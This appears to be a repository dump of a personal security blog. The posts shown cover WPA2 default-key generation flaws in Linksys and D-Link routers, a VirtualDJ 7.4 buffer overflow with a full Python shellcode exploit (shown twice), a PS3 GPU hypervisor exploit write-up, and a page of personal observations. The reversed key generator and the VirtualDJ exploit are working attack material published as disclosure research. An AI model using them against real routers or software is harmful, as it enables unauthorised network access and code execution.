WBR-2310 66 | 67 | 68 | ## Resources 69 | 70 | * __Linksys-CheckKeys__: Check if your key is vulnerable to this attack, i.e., find whether your key is in the set of keys generated by all possible seeds. Download: [http://www.mediafire.com/download.php?pmqt9aykwxhwkto](http://www.mediafire.com/download.php?pmqt9aykwxhwkto). 71 | * __Linksys-GenSeeds__: This tool calculates the seed interval from the given time interval in which the router might have been installed. Download: [http://www.mediafire.com/download.php?kpe7844kqd9bk4j](http://www.mediafire.com/download.php?kpe7844kqd9bk4j). 72 | * __Linksys-GenKeys__: Generate a key dictionary by specifying a seed interval. Download: [http://www.mediafire.com/download.php?2h9y0pkay9id1rt](http://www.mediafire.com/download.php?2h9y0pkay9id1rt). 73 | 74 | 75 | ## Solutions 76 | 77 | * Do not use seeds at all. 
Feed the results of a cryptographically secure PRNG such as `/dev/urandom` in Unix-like systems as indices of the character array modulo its length. This is for instance what the Linksys E4200 WLAN routers do: the indices of the key character array are provided by `CryptGenRandom` in `Advapi32.dll`. 78 | * If for some reason you want to use seeds for generating keys: 79 | * Make them bigger than 32-bit. Just 2^32 keys are easy to check. 80 | * Obtain them from a cryptographically secure PRNG. 81 | * If you still want to obtain them from the system time, use fine-grained time intervals (e.g. elapsed time in nanoseconds rather than seconds) to minimize the number of bits an attacker can guess. 82 | -------------------------------------------------------------------------------- /posts/2013-03-31-wpa2-vulnerability-linksys-dlink/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | WPA2 Key Generation Vulnerability: Linksys / D-Link 8 | 9 | 10 | 11 | 51 | 52 | 53 |
54 | 61 | < Other articles 62 |
63 |
64 |

WPA2 Key Generation Vulnerability: Linksys / D-Link

65 |

66 | AuthorAlexandro Sanchez 69 | Date2013-03-31 72 |

73 |

After finding the TP-Link WPA2 Key Generation Vulnerability, I reverse-engineered assistants provided by other vendors. It turns out that some Linksys and D-Link routers use nearly identical algorithms to generate the default WPA2 keys as TP-Link routers use. For more information about this vulnerability and its consequences, please refer to the report linked above as redundant information will be omitted here.

74 |

This time, the vulnerability affects the Linksys EasyLink Advisor and D-Link Quick Setup Wizard assistants, both based on Network Magic, software created by Pure Networks, a company belonging to Cisco/Linksys. Since Pure Networks actually sold their software to third parties, e.g. D-Link, there might be a chance of other affected assistants.

75 |

The reversed generator is:

76 |
blacklist_windows = "1I2Z0O5SUV"
 77 | blacklist_macosx  = "B8DO0I1S5UVZ2"
 78 | blacklist = blacklist_windows  # Change me
 79 | 
 80 | def gen(seed):
 81 |     key = ""
 82 |     for i in range(10):
 83 |         while True:
 84 |             seed = ((seed * 0x343FD) + 0x269EC3) % (2**32)
 85 |             edx = ((seed >> 0x10) & 0x7FFF) % 0x24
 86 |             if edx >= 0xA:
 87 |                 edx += 0x37
 88 |             else:
 89 |                 edx += 0x30
 90 |             if chr(edx) not in blacklist:
 91 |                 key += chr(edx)
 92 |                 break
 93 |     return key
 94 | 
95 | 96 | 97 |

The seeds used by this function are obtained in exactly the same way as in the TP-Link assistant. The only difference this time is that rather than pseudorandomly choosing characters from a whitelist, it adds random characters in range [0-9A-Z], filtering out those found in a hardcoded blacklist, meant to prevent adding visually similar characters such as '0' and 'O' to the key.

98 |

As explained in the TP-Link vulnerability report, the low entropy can be exploited to bruteforce the key in a matter of minutes with a powerful GPU or hours with a CPU.

99 |

Affected routers

100 |

The complete list of affected Linksys routers is:

101 | 114 |

The complete list of affected D-Link routers is:

115 | 125 |

Resources

126 | 131 |

Solutions

132 | 139 |
140 |
141 | 147 | 148 | 149 | -------------------------------------------------------------------------------- /posts/2013-04-20-virtualdj-74-buffer-overflow/_main.md: -------------------------------------------------------------------------------- 1 | --- 2 | layout: post 3 | date: 2013-04-20 4 | title: VirtualDJ Pro/Home 7.4: Buffer Overflow 5 | author: Alexandro Sanchez 6 | --- 7 | 8 | I have found a buffer overflow vulnerability in [VirtualDJ Pro 7.4 and VirtualDJ Home 7.4](http://www.virtualdj.com/) and possibly previous versions of this software. After right-clicking a file and entering the "_File Infos_" > "_Cover..._" menu, VirtualDJ tries to find a cover for the given file on Google Images and stores the request URL in a buffer which looks like: `"http://images.google.com/images?q=X"` where `X` corresponds to the ID3 tag _Title_. Special characters of this tag are ignored, and any sequence of symbols (e.g. `' '`, `'-'`, `'_'`) is replaced with `'+'`. The problem is [once again](../2013-03-30-virtualdj-73-buffer-overflow/) that VirtualDJ does not check if the information stored in the ID3 tags is too big to fit in the buffer. 9 | 10 | To exploit this vulnerability, I searched for a `call esp` instruction stored in an address that could be represented with alphanumeric characters, I found such instruction in 0x444D4C64, that is, `"dLMD"`. After entering this call, all the bytes after the _Fake Title_ + _Spaces_ + _Padding_ + `"dLMD"` will be executed. Since we can only use alphanumeric characters, we have to encode the shellcode and decode it in execution time using only bytes in range `[0-9A-Za-z]`. For this purpose I used a function from [ALPHA3](http://code.google.com/p/alpha3/). After that, the original shellcode will be decoded and executed. 
11 | 12 | ```python 13 | #Exploit: VirtualDJ Pro/Home <=7.4 Buffer Overflow Vulnerability 14 | #By: Alexandro Sanchez Bach | functionmixer.blogspot.com 15 | #More info: http://www.youtube.com/watch?v=Yini294AR2Q 16 | 17 | def encodeData(decoder, data, validValues): 18 | assert data.find("\0") == -1, "Shellcode must be NULL free" 19 | data += "\0" #End of shellcode 20 | encData = decoder[-2:] 21 | decoder = decoder[:-2] 22 | for p in range(len(data)): 23 | dByte = ord(data[p]) 24 | pxByte = ord(encData[p+1]) 25 | bx, by = encoder(dByte ^ pxByte, validValues) 26 | encData += chr(bx) + chr(by) 27 | return decoder + encData 28 | 29 | def encoder(value, validValues): 30 | for bx in validValues: 31 | imul = (bx * 0x30) & 0xFF 32 | for by in validValues: 33 | if imul ^ by == value: return [bx, by] 34 | 35 | 36 | #Shellcode (e.g. run cmd.exe) 37 | shellcode = "\xB8\xFF\xEF\xFF\xFF\xF7\xD0\x2B\xE0\x55\x8B\xEC" 38 | shellcode += "\x33\xFF\x57\x83\xEC\x04\xC6\x45\xF8\x63\xC6\x45" 39 | shellcode += "\xF9\x6D\xC6\x45\xFA\x64\xC6\x45\xFB\x2E\xC6\x45" 40 | shellcode += "\xFC\x65\xC6\x45\xFD\x78\xC6\x45\xFE\x65\x8D\x45" 41 | shellcode += "\xF8\x50\xBB\xC7\x93\xBF\x77\xFF\xD3" 42 | retAddress = "\xED\x1E\x94\x7C" # jmp ESP ntdll.dll WinXP SP2 43 | shellcode += retAddress 44 | 45 | #Arguments 46 | fakeTitle = "Greatest Hits of the Internet - Nyan Cat" 47 | while fakeTitle[0] == " ": fakeTitle = fakeTitle[1:] 48 | while fakeTitle[-1] == " ": fakeTitle = fakeTitle[:-1] 49 | for i in fakeTitle: 50 | if i not in "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz -": 51 | raise "Invalid characters in the fake title" 52 | fakeTitle2 = fakeTitle.replace("-"," ") 53 | while " " in fakeTitle2: fakeTitle2 = fakeTitle2.replace(" "," ") 54 | 55 | #Exploit 56 | exploit = fakeTitle + " "*1024 + "1"*(1026 - len(fakeTitle2)-1) 57 | exploit += "dLMD" #RETN address 58 | exploit += "XXAI" #ESP := Baseaddr of encoded payload 59 | exploit += encodeData( 60 | "TYhffffk4diFkDql02Dqm0D1CuEE", 
#Baseaddr of encoded payload := ESP 61 | shellcode, 62 | map(ord, list("0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz")) 63 | ) 64 | 65 | print exploit 66 | #Paste the generated code in the tag 'Title' of the MP3 file. 67 | ``` 68 | 69 | You can see a demo of this proof of concept at: https://www.youtube.com/watch?v=Yini294AR2Q. 70 | 71 | ## Log 72 | 73 | * __2013-04-07__: Bug discovered. VirtualDJ was emailed about this a few days later. 74 | * __2013-04-20__: Bug ignored. Exploit published. 75 | -------------------------------------------------------------------------------- /posts/2013-04-20-virtualdj-74-buffer-overflow/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | VirtualDJ Pro/Home 7.4: Buffer Overflow 8 | 9 | 10 | 11 | 51 | 52 | 53 |
54 | 61 | < Other articles 62 |
63 |
64 |

VirtualDJ Pro/Home 7.4: Buffer Overflow

65 |

66 | AuthorAlexandro Sanchez 69 | Date2013-04-20 72 |

73 |

I have found a buffer overflow vulnerability in VirtualDJ Pro 7.4 and VirtualDJ Home 7.4 and possibly previous versions of this software. After right-clicking a file and entering the "File Infos" > "Cover..." menu, VirtualDJ tries to find a cover for the given file on Google Images and stores the request URL in a buffer which looks like: "http://images.google.com/images?q=X" where X corresponds to the ID3 tag Title. Special characters of this tag are ignored, and any sequence of symbols (e.g. ' ', '-', '_') is replaced with '+'. The problem is once again that VirtualDJ does not check if the information stored in the ID3 tags is too big to fit in the buffer.

74 |

To exploit this vulnerability, I searched for a call esp instruction stored in an address that could be represented with alphanumeric characters, I found such instruction in 0x444D4C64, that is, "dLMD". After entering this call, all the bytes after the Fake Title + Spaces + Padding + "dLMD" will be executed. Since we can only use alphanumeric characters, we have to encode the shellcode and decode it in execution time using only bytes in range [0-9A-Za-z]. For this purpose I used a function from ALPHA3. After that, the original shellcode will be decoded and executed.

75 |
#Exploit: VirtualDJ Pro/Home <=7.4 Buffer Overflow Vulnerability 
 76 | #By: Alexandro Sanchez Bach | functionmixer.blogspot.com 
 77 | #More info: http://www.youtube.com/watch?v=Yini294AR2Q 
 78 | 
 79 | def encodeData(decoder, data, validValues):
 80 |     assert data.find("\0") == -1, "Shellcode must be NULL free"
 81 |     data += "\0" #End of shellcode 
 82 |     encData = decoder[-2:]
 83 |     decoder = decoder[:-2]
 84 |     for p in range(len(data)):
 85 |         dByte = ord(data[p])
 86 |         pxByte = ord(encData[p+1])
 87 |         bx, by = encoder(dByte ^ pxByte, validValues)
 88 |         encData += chr(bx) + chr(by)
 89 |     return decoder + encData
 90 | 
 91 | def encoder(value, validValues): 
 92 |       for bx in validValues:
 93 |         imul = (bx * 0x30) &amp; 0xFF
 94 |         for by in validValues:
 95 |             if imul ^ by == value: return [bx, by]
 96 | 
 97 | 
 98 | #Shellcode (e.g. run cmd.exe) 
 99 | shellcode  = "\xB8\xFF\xEF\xFF\xFF\xF7\xD0\x2B\xE0\x55\x8B\xEC"
100 | shellcode += "\x33\xFF\x57\x83\xEC\x04\xC6\x45\xF8\x63\xC6\x45"
101 | shellcode += "\xF9\x6D\xC6\x45\xFA\x64\xC6\x45\xFB\x2E\xC6\x45"
102 | shellcode += "\xFC\x65\xC6\x45\xFD\x78\xC6\x45\xFE\x65\x8D\x45"
103 | shellcode += "\xF8\x50\xBB\xC7\x93\xBF\x77\xFF\xD3"
104 | retAddress = "\xED\x1E\x94\x7C" # jmp ESP ntdll.dll WinXP SP2 
105 | shellcode += retAddress
106 | 
107 | #Arguments 
108 | fakeTitle  = "Greatest Hits of the Internet - Nyan Cat"
109 | while fakeTitle[0]  == " ": fakeTitle = fakeTitle[1:]
110 | while fakeTitle[-1] == " ": fakeTitle = fakeTitle[:-1]
111 | for i in fakeTitle:
112 |     if i not in "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz -":
113 |         raise "Invalid characters in the fake title"
114 | fakeTitle2 = fakeTitle.replace("-"," ")
115 | while " " in fakeTitle2: fakeTitle2 = fakeTitle2.replace(" "," ")
116 | 
117 | #Exploit 
118 | exploit =  fakeTitle + " "*1024 + "1"*(1026 - len(fakeTitle2)-1)
119 | exploit += "dLMD" #RETN address 
120 | exploit += "XXAI" #ESP := Baseaddr of encoded payload 
121 | exploit += encodeData(
122 |     "TYhffffk4diFkDql02Dqm0D1CuEE", #Baseaddr of encoded payload := ESP 
123 |     shellcode,
124 |     map(ord, list("0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"))
125 | )
126 | 
127 | print exploit
128 | #Paste the generated code in the tag 'Title' of the MP3 file.
129 | 
130 | 131 | 132 |

You can see a demo of this proof of concept at: https://www.youtube.com/watch?v=Yini294AR2Q.

133 |

Log

134 | 138 |
139 |
140 | 146 | 147 | 148 | -------------------------------------------------------------------------------- /posts/2016-03-16-ps3-gpu-exploit/_main.md: -------------------------------------------------------------------------------- 1 | --- 2 | layout: post 3 | date: 2016-03-16 4 | title: PS3 GPU Full VRAM/IO access exploit 5 | author: Alexandro Sanchez 6 | --- 7 | 8 | ## Introduction 9 | 10 | During the early development of the PlayStation 3 emulator project [Nucleus](https://github.com/AlexAltea/nucleus), it was decided to do a high-level emulation of the PlayStation 3 kernel known as CellOS Lv-2, often shortened to *LV2*. This implied reverse engineering and reimplementing the kernel, and intercept the syscalls used by the user-mode applications. The correct reimplementation of a certain group of syscalls, the kernel-level RSX driver interface with prefix `sys_rsx`, was crucial to the success of the GPU emulation. Additionally, these syscalls are a thin wrapper of the actual hypervisor-level RSX driver, accessible through the `lv1_gpu` syscalls. 11 | 12 | Between February 2016 and March 2016, the developer *@3141card* reverse engineered the RSX driver code found in both layers. These sources, combined with the documentation and headers from the [Envytools](https://github.com/envytools/envytools)/[Nouveau](https://nouveau.freedesktop.org) projects and advice from *@mwk* eased the security analysis, resulting in the vulnerability presented here. 13 | 14 | ## Reality Synthesizer 15 | 16 | The Reality Synthesizer, commonly shortened to RSX, is the PlayStation 3 GPU and is composed of multiple engines. Gross over-simplifications take place throughout this section for the sake of readability. 
RSX exposes 3 Base Address Registers (BARs): 17 | 18 | | BAR | Offset | Size | Description | 19 | |--------|-----------------|---------|-------------| 20 | | *BAR0* | `0x28000000000` | 32 MB | MMIO | 21 | | *BAR1* | `0x28080000000` | 256 MB | VRAM | 22 | | *BAR2* | `0x28002000000` | *???* | RAMIN | 23 | 24 | While *BAR0* points to the MMIO register area, both *BAR1* and *BAR2* map to the same 256 MB DDR memory. The difference is that BAR2 offsets are reversed, starting from the end of the VRAM and going to the beginning in chunks of 512 KB. Following formulas can be used to convert a BAR1 offset into a BAR2 offset and vice-versa: 25 | 26 | ```cpp 27 | uint32_t addr_vram_to_pramin(uint32_t offset) { 28 | uint32_t vram_size = 0x10000000; // 256 MB 29 | uint32_t rev_size = 0x80000; // 512 KB 30 | return (offset - vram_size) ^ -rev_size; 31 | } 32 | 33 | uint32_t addr_ramin_to_vram(uint32_t offset) { 34 | uint32_t vram_size = 0x10000000; // 256 MB 35 | uint32_t rev_size = 0x80000; // 512 KB 36 | return vram_size - (offset - (offset % rev_size)) - rev_size + (offset % rev_size); 37 | } 38 | ``` 39 | 40 | The driver fills RAMIN with objects which can be either *Engine objects* or *DMA objects*, commonly known as *FIFO objects*. The first kind describe engines that do a particular task (e.g. 2D graphics, 3D graphics, memory copying, etc.) the latter describe a DMA-accessible location. 41 | 42 | Certain methods require a DMA object in order to know which data to access. Rather than directly passing the RAMIN offset to the engine, the driver populates hash-table known as *RAMHT* which maps a unique handler to the RAMIN offset where the target DMA object is located. 43 | 44 | The DMA objects contain information about the access type, the range size and starting offset. 
Taking into account the IO segments mapped by LV1, a DMA object can reference the following offsets: 45 | 46 | | Offset | Description | 47 | |-----------------------------|-------------------| 48 | | `0x00000000` - `0x0FFFFFFF` | VRAM | 49 | | `0x80000000` - `0x8FFFFFFF` | IOMMU (Context 0) | 50 | | `0x90000000` - `0x9FFFFFFF` | IOMMU (Context 1) | 51 | 52 | ## Exploit 53 | 54 | ### RSX MMIO register mapping 55 | 56 | The LV2 kernel provides the following syscall: 57 | 58 | ```cpp 59 | // LV2 SysCall 675 (0x2A3) 60 | uint64_t sys_rsx_device_map(uint64_t mmio_addr, uint64_t vram_addr, uint64_t device_id); 61 | ``` 62 | 63 | The table below lists the RSX devices that can be mapped through this syscall. The highlighted entries correspond to the devices involved in the vulnerability: 64 | 65 | | Device | MMIO | VRAM | Description | Control | 66 | |--------|----------------|------------------|-----------------|---------| 67 | | 5 | `0x08A000` | `----------` | | No | 68 | | 6 | `0x200000` | `----------` | PMEDIA | No | 69 | | 7 | `0x600000` | `----------` | PCRTC | No | 70 | | 8 | `--------` | `0x0FF10000` | | No | 71 | | 9 | `0x400000` | `----------` | PGRAPH | Yes | 72 | | 10 | `0x100000` | `----------` | PFB | Yes | 73 | | 11 | `0x00A000` | `----------` | PCOUNTER | Yes | 74 | | 12 | `0x680000` | `----------` | | Yes | 75 | | 13 | `0x090000` | `----------` | | Yes | 76 | | __14__ | __`0x002000`__ | __`----------`__ | __PFIFO__ | __Yes__ | 77 | | 15 | `0x088000` | `----------` | IOIF | Yes | 78 | 79 | By mapping the device 14, we can access the PFIFO MMIO registers from the userland code (or LV2 if `ss.param.fself.control` prevents from doing that and the EEPROM cannot be patched). Among the many PFIFO registers listed in the Nouveau headers and documents, some of them struck as particularly dangerous if misused. These registers are described below: 80 | 81 | * `0x002140` *NV03_PFIFO_INTR_EN_0*: Disable the interrupts that trigger LV1 panics. 
82 | * `0x002210` *NV03_PFIFO_RAMHT*: Controls the size and RAMIN offset of RAMHT. 83 | * `0x002218` *NV03_PFIFO_RAMRO*: Controls the size and RAMIN offset of RAMRO. 84 | * `0x002504` *NV04_PFIFO_MODE*: Alternate between PIO and DMA mode in channels. 85 | 86 | These register fields are described in detail in [nv1_pfifo.xml](https://github.com/envytools/envytools/blob/master/rnndb/fifo/nv1_pfifo.xml). CellOS-LV1 places RAMHT at RAMIN offset `0x10000` with a size of 16 KB, and RAMRO at RAMIN offset `0x18000` with a size of 512 bytes. 87 | 88 | ### RAMHT manipulation attempt 89 | 90 | Our best chance to create custom DMA objects is to create a RAMHT entry pointing to an accessible VRAM area. The first attempt to do so would be moving RAMHT to reinterpret other byte sequences as valid entries. By the information before, RAMHT can only be relocated in the range *0x0* to *0x1F000* and have an alignment of 4 KB. In order to get a valid RAMHT entry pointing to our VRAM area, we need to find an 8-byte sequence satisfying: 91 | 92 | 1. Reinterpreting the bits 31:23 (MSB:LSB) of the second word is equal to 1 (i.e. our application's PFIFO channel). 93 | 2. Reinterpreting the bits 19:0 (MSB:LSB) of the second word is a value in range `[0x20000-0xFFFFF]` (mappable VRAM). 94 | 3. Calculating the RAMHT offset minus the entry offset results in a multiple of 4 KB. 95 | 96 | These conditions are hard to satisfy and aside from unlikely random values that might have been written during memtest, they will not be found in this range. 97 | 98 | ### RAMRO as RAMHT entry generator 99 | 100 | However, there is still a way to get such entries in RAMHT. RAMRO can only be relocated in the range *0x0* to *0x1FE00* and have an alignment of 512 bytes. The submission of invalid PFIFO commands causes 8-byte writes in RAMRO in which the first word holds the error report and the second word the submitted argument. 
We can control the argument and predict the error report, thus being able to generate valid RAMHT entries. In order to preserve the integrity of RAMHT we should ensure that no existing entry is overwritten: 101 | 102 | 1. Invalid PFIFO methods that trigger RAMRO writes in PIO mode are: { 0x0040, 0x0044, 0x0048, 0x0054 }. 103 | 2. Their corresponding RAMRO error reports are { 0x50401040, 0x50401044, 0x50401048, 0x50401054 }. 104 | 3. Their corresponding RAMHT offsets for channel 1 are: { 0x0C18, 0x0C38, 0x0C58, 0x0CB8 }. 105 | 106 | After computing the RAMHT offsets for all pairs consisting of any handles ever created by the LV1 driver and any possible channel ID (up to the maximum of 4 that LV1 supports), we know that no handle will ever be placed by the driver in the RAMHT range `0xC00` - `0xCFF` (note that `0xC00` is 512 byte aligned). Therefore, RAMRO could be moved inside RAMHT without fearing a collision. 107 | 108 | ### Accessing custom DMA objects 109 | 110 | The reserved VRAM for `vsh.self` (VirtualShell/XMB), i.e. channel 0, is allocated from the front and the remaining VRAM aside from the first 2 MB of RAMIN is assigned to the application, i.e. channel 1, by the GCM library. Therefore any RAMIN offset bigger than 2 MB assigned to channel 1 will lie in an accessible VRAM area. E.g.: 111 | 112 | ```cpp 113 | 0x00880000 == (1 /*Channel ID*/ << 23) | (0x800000 /*RAMIN offset at 8 MB*/ >> 4) 114 | ``` 115 | 116 | The only remaining step is placing our custom DMA object in that offset. Finally a combination of the PFIFO puller methods can be used to trigger a write in our custom DMA range: 117 | 118 | * `0x0060` *NV406E_SET_CONTEXT_DMA_SEMAPHORE*: Set DMA object handle (i.e. the `0x504010XX` reports above) 119 | * `0x0064` *NV406E_SEMAPHORE_OFFSET*: Set the offset we want to write in. 120 | * `0x006C` *NV406E_SEMAPHORE_RELEASE*: Write the specified value there. 
121 | 122 | If the specified value ends up at said offset in the range specified by our DMA object the exploit succeeded. 123 | -------------------------------------------------------------------------------- /posts/2016-03-16-ps3-gpu-exploit/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | PS3 GPU Full VRAM/IO access exploit 8 | 9 | 10 | 11 | 51 | 52 | 53 |
54 | 61 | < Other articles 62 |
63 |
64 |

PS3 GPU Full VRAM/IO access exploit

65 |

66 | AuthorAlexandro Sanchez 69 | Date2016-03-16 72 |

73 |

Introduction

74 |

During the early development of the PlayStation 3 emulator project Nucleus, it was decided to do a high-level emulation of the PlayStation 3 kernel known as CellOS Lv-2, often shortened to LV2. This implied reverse engineering and reimplementing the kernel, and intercepting the syscalls used by the user-mode applications. The correct reimplementation of a certain group of syscalls, the kernel-level RSX driver interface with prefix sys_rsx, was crucial to the success of the GPU emulation. Additionally, these syscalls are a thin wrapper of the actual hypervisor-level RSX driver, accessible through the lv1_gpu syscalls.

75 |

Between February 2016 and March 2016, the developer @3141card reverse engineered the RSX driver code found in both layers. These sources, combined with the documentation and headers from the Envytools/Nouveau projects and advice from @mwk eased the security analysis, resulting in the vulnerability presented here.

76 |

Reality Synthesizer

77 |

The Reality Synthesizer, commonly shortened to RSX, is the PlayStation 3 GPU and is composed of multiple engines. Gross over-simplifications take place throughout this section for the sake of readability. RSX exposes 3 Base Address Registers (BARs):

78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 |
BAROffsetSizeDescription
BAR00x2800000000032 MBMMIO
BAR10x28080000000256 MBVRAM
BAR20x28002000000???RAMIN
108 |

While BAR0 points to the MMIO register area, both BAR1 and BAR2 map to the same 256 MB DDR memory. The difference is that BAR2 offsets are reversed, starting from the end of the VRAM and going to the beginning in chunks of 512 KB. The following formulas can be used to convert a BAR1 offset into a BAR2 offset and vice-versa:

109 |
uint32_t addr_vram_to_pramin(uint32_t offset) {
110 |     uint32_t vram_size = 0x10000000; // 256 MB
111 |     uint32_t rev_size = 0x80000; // 512 KB
112 |     return (offset - vram_size) ^ -rev_size;
113 | }
114 | 
115 | uint32_t addr_ramin_to_vram(uint32_t offset) {
116 |     uint32_t vram_size = 0x10000000; // 256 MB
117 |     uint32_t rev_size = 0x80000; // 512 KB
118 |     return vram_size - (offset - (offset % rev_size)) - rev_size + (offset % rev_size);
119 | }
120 | 
121 | 122 | 123 |

The driver fills RAMIN with objects which can be either Engine objects or DMA objects, commonly known as FIFO objects. The former describe engines that perform a particular task (e.g. 2D graphics, 3D graphics, memory copying, etc.), while the latter describe a DMA-accessible location.

124 |

Certain methods require a DMA object in order to know which data to access. Rather than directly passing the RAMIN offset to the engine, the driver populates a hash table known as RAMHT, which maps a unique handle to the RAMIN offset where the target DMA object is located.

125 |

The DMA objects contain information about the access type, the range size and starting offset. Taking into account the IO segments mapped by LV1, a DMA object can reference the following offsets:

126 | 127 | 128 | 129 | 130 | 131 | 132 | 133 | 134 | 135 | 136 | 137 | 138 | 139 | 140 | 141 | 142 | 143 | 144 | 145 | 146 | 147 |
OffsetDescription
0x00000000 - 0x0FFFFFFFVRAM
0x80000000 - 0x8FFFFFFFIOMMU (Context 0)
0x90000000 - 0x9FFFFFFFIOMMU (Context 1)
148 |

Exploit

149 |

RSX MMIO register mapping

150 |

The LV2 kernel provides the following syscall:

151 |
// LV2 SysCall 675 (0x2A3)
152 | uint64_t sys_rsx_device_map(uint64_t mmio_addr, uint64_t vram_addr, uint64_t device_id);
153 | 
154 | 155 | 156 |

The table below lists the RSX devices that can be mapped through this syscall. The highlighted entries correspond to the devices involved in the vulnerability:

157 | 158 | 159 | 160 | 161 | 162 | 163 | 164 | 165 | 166 | 167 | 168 | 169 | 170 | 171 | 172 | 173 | 174 | 175 | 176 | 177 | 178 | 179 | 180 | 181 | 182 | 183 | 184 | 185 | 186 | 187 | 188 | 189 | 190 | 191 | 192 | 193 | 194 | 195 | 196 | 197 | 198 | 199 | 200 | 201 | 202 | 203 | 204 | 205 | 206 | 207 | 208 | 209 | 210 | 211 | 212 | 213 | 214 | 215 | 216 | 217 | 218 | 219 | 220 | 221 | 222 | 223 | 224 | 225 | 226 | 227 | 228 | 229 | 230 | 231 | 232 | 233 | 234 | 235 | 236 | 237 | 238 | 239 | 240 | 241 | 242 | 243 | 244 | 245 | 246 |
DeviceMMIOVRAMDescriptionControl
50x08A000----------No
60x200000----------PMEDIANo
70x600000----------PCRTCNo
8--------0x0FF10000No
90x400000----------PGRAPHYes
100x100000----------PFBYes
110x00A000----------PCOUNTERYes
120x680000----------Yes
130x090000----------Yes
140x002000----------PFIFOYes
150x088000----------IOIFYes
247 |

By mapping device 14, we can access the PFIFO MMIO registers from userland code (or from LV2, if ss.param.fself.control prevents us from doing that and the EEPROM cannot be patched). Among the many PFIFO registers listed in the Nouveau headers and documents, some struck us as particularly dangerous if misused. These registers are described below:

248 | 254 |

These register fields are described in detail here in nv1_pfifo.xml. CellOS-LV1 places RAMHT at RAMIN offset 0x10000 with a size of 16 KB, and RAMRO at RAMIN offset 0x18000 with a size of 512 bytes.

255 |

RAMHT manipulation attempt

256 |

Our best chance to create custom DMA objects is to create a RAMHT entry pointing to an accessible VRAM area. The first attempt to do so would be moving RAMHT to reinterpret other byte sequences as valid entries. Given the information above, RAMHT can only be relocated in the range 0x0 to 0x1F000 and must have an alignment of 4 KB. In order to get a valid RAMHT entry pointing to our VRAM area, we need to find an 8-byte sequence satisfying:

257 |
    258 |
  1. Reinterpreting the bits 31:23 (MSB:LSB) of the second word is equal to 1 (i.e. our application's PFIFO channel).
  2. 259 |
  3. Reinterpreting the bits 19:0 (MSB:LSB) of the second word is a value in range [0x20000-0xFFFFF] (mappable VRAM).
  4. 260 |
  5. Calculating the RAMHT offset minus the entry offset results in a multiple of 4 KB.
  6. 261 |
262 |

These conditions are hard to satisfy and aside from unlikely random values that might have been written during memtest, they will not be found in this range.

263 |

RAMRO as RAMHT entry generator

264 |

However, there is still a way to get such entries in RAMHT. RAMRO can only be relocated in the range 0x0 to 0x1FE00 and must have an alignment of 512 bytes. The submission of invalid PFIFO commands causes 8-byte writes in RAMRO in which the first word holds the error report and the second word the submitted argument. We can control the argument and predict the error report, thus being able to generate valid RAMHT entries. In order to preserve the integrity of RAMHT we should ensure that no existing entry is overwritten:

265 |
    266 |
  1. Invalid PFIFO methods that trigger RAMRO writes in PIO mode are: { 0x0040, 0x0044, 0x0048, 0x0054 }.
  2. 267 |
  3. Their corresponding RAMRO error reports are { 0x50401040, 0x50401044, 0x50401048, 0x50401054 }.
  4. 268 |
  5. Their corresponding RAMHT offsets for channel 1 are: { 0x0C18, 0x0C38, 0x0C58, 0x0CB8 }.
  6. 269 |
270 |

After computing the RAMHT offsets for all pairs consisting of any handles ever created by the LV1 driver and any possible channel ID (up to the maximum of 4 that LV1 supports), we know that no handle will ever be placed by the driver in the RAMHT range 0xC00 - 0xCFF (note that 0xC00 is 512-byte aligned). Therefore RAMRO could be moved inside RAMHT without fearing a collision.

271 |

Accessing custom DMA objects

272 |

The reserved VRAM for vsh.self (VirtualShell/XMB), i.e. channel 0, is allocated from the front and the remaining VRAM aside from the first 2 MB of RAMIN is assigned to the application, i.e. channel 1, by the GCM library. Therefore any RAMIN offset bigger than 2 MB assigned to channel 1 will lie in an accessible VRAM area. E.g.:

273 |
0x00880000 == (1 /*Channel ID*/ << 23) | (0x800000 /*RAMIN offset at 8 MB*/ >> 4)
274 | 
275 | 276 | 277 |

The only remaining step is placing our custom DMA object at that offset. Finally, a combination of the PFIFO puller methods can be used to trigger a write in our custom DMA range:

278 | 283 |

If the specified value ends up at said offset in the range specified by our DMA object the exploit succeeded.

284 |
285 |
286 | 292 | 293 | 294 | -------------------------------------------------------------------------------- /posts/2016-08-22-observations/_main.md: -------------------------------------------------------------------------------- 1 | --- 2 | layout: live 3 | date: 2016-08-22 4 | title: Observations 5 | author: Alexandro Sanchez 6 | --- 7 | 8 | Random observations, questions, and interesting facts that caught my attention. If you can expand or answer any of these, please feel free to contact me. 9 | 10 | ## Light 11 | 12 | * When observing a blacklight or UV-A light, i.e. one of these blue/purple-ish lamps that make white and fluorescent objects especially bright, my eyes disagree on the perceived light. From my point of view: My left eye shows it blurry, as if it couldn't focus on the light source and with a slightly darker-blue hue. My right eye focuses correctly on the light source, but perceives it with a slightly brighter-purple color. 13 | 14 | * Doing fast eye movements while keeping a LED-based white light in my field of view, makes the light be perceived as separate red-green-blue components at different positions. Why does this happen? 15 | 16 | * When firing small handheld lasers, one can perceive a fine-grained pattern of dots where the beam hits. Any small translation or rotation of the laser diode seems to completely change this pattern. Since involuntary movements are hard to avoid, the resulting effect looks like video noise. Why does this happen? 17 | 18 | 19 | ## Climate 20 | 21 | * Suggested by the *clathrate gun hypothesis* [1], the rise in global temperatures will cause, or is causing, vast amounts of methane gas to be released into the atmosphere. The impact of methane gas is more than 25 times higher than that of carbon dioxide [2], thus resulting in devastating consequences for the whole planet. Burning methane corresponds to the reaction: CH4 + 2 O2 -> CO2 + 2 H2O.
